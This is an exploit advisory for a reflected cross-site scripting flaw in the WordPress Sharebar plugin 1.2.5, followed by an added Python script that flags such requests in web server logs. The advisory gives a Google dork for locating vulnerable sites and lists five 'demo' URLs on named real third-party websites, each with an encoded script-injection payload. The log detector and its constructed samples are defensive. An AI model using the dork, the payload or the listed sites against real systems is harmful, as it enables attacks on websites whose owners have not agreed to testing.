WordPress Sharebar plugin version 1.2.5 suffers from a cross site scripting vulnerability. Note that this advisory has site-specific information.
#######################################################################
# Exploit Title : WordPress Sharebar plugin Cross Site Scripting Vulnerability
#
# Exploit Author : Ashiyane Digital Security Team
#
# Google Dork : inurl:/wp-content/plugins/sharebar
#
# Date: 2013/09/24
#
# Vendor Homepage : http://wordpress.org/plugins/sharebar
#
# Software Link : http://downloads.wordpress.org/plugin/sharebar.zip
#
# Version : 1.2.5
#
# Tested on: Windows
#
##############
#
# Location : Site/wp-content/plugins/sharebar/sharebar-admin.php?page=[xss]
#
##############
# Demo:
#
# http://www.andreafelder.com/wp-content/plugins/sharebar/sharebar-admin.php?page=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
# http://www.buyukanadolutipmerkezi.com/wp-content/plugins/sharebar/sharebar-admin.php?page=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
# http://www.baxterbowlingcostarica.com/wp-content/plugins/sharebar/sharebar-admin.php?page=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
# http://www.intikala.com/design/KellyTirman/wp-content/plugins/sharebar/sharebar-admin.php?page=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
# http://www.kirktalon.com/kirksite2011/wp-content/plugins/sharebar/sharebar-admin.php?page=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
##############
#
# Discovered By : ACC3SS
#
##############
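
A log check for requests that put markup into the `page` parameter of sharebar-admin.php, as described in the Location line above. This is an added example, not part of the original advisory or the plugin's code; the combined access-log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Script path taken from the advisory's "Location" line.
VULN_PATH = "/wp-content/plugins/sharebar/sharebar-admin.php"
# Characters that let a reflected value close an attribute or open a tag.
MARKUP = re.compile(r"[<>\"']")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, max_rounds=3):
    """Undo nested percent-encoding, e.g. %253C -> %3C -> <."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_page_param(log_line):
    """Return the decoded 'page' value when a request to the Sharebar admin
    script carries markup characters in it, otherwise None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    raw_path, _, query = match.group(1).partition("?")
    # Collapse repeated slashes and ignore case so path variants still match.
    path = re.sub(r"/{2,}", "/", unquote(raw_path)).lower()
    if not path.endswith(VULN_PATH):
        return None
    for raw in parse_qs(query, keep_blank_values=True).get("page", []):
        value = decode_fully(raw)
        if MARKUP.search(value):
            return value
    return None

# Constructed sample log lines (documentation IPs, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Sep/2013:10:00:01 +0000] "GET /wp-content/plugins/sharebar/sharebar-admin.php?page=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.11 - - [24/Sep/2013:10:00:02 +0000] "GET /wp-content/plugins/sharebar/sharebar-admin.php?page=settings HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.12 - - [24/Sep/2013:10:00:03 +0000] "GET /blog//wp-content/plugins/sharebar/sharebar-admin.php?page=%2522%253E HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.13 - - [24/Sep/2013:10:00:04 +0000] "GET /index.php?page=%3Cb%3E HTTP/1.1" 200 512 "-" "-"',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        hit = suspicious_page_param(line)
        if hit is not None:
            print("ALERT page=%r from %s" % (hit, line.split()[0]))
```

Any direct request to a file under wp-content/plugins/ that returns 200 is worth reviewing on its own, since plugin admin scripts are normally loaded through wp-admin rather than fetched by path.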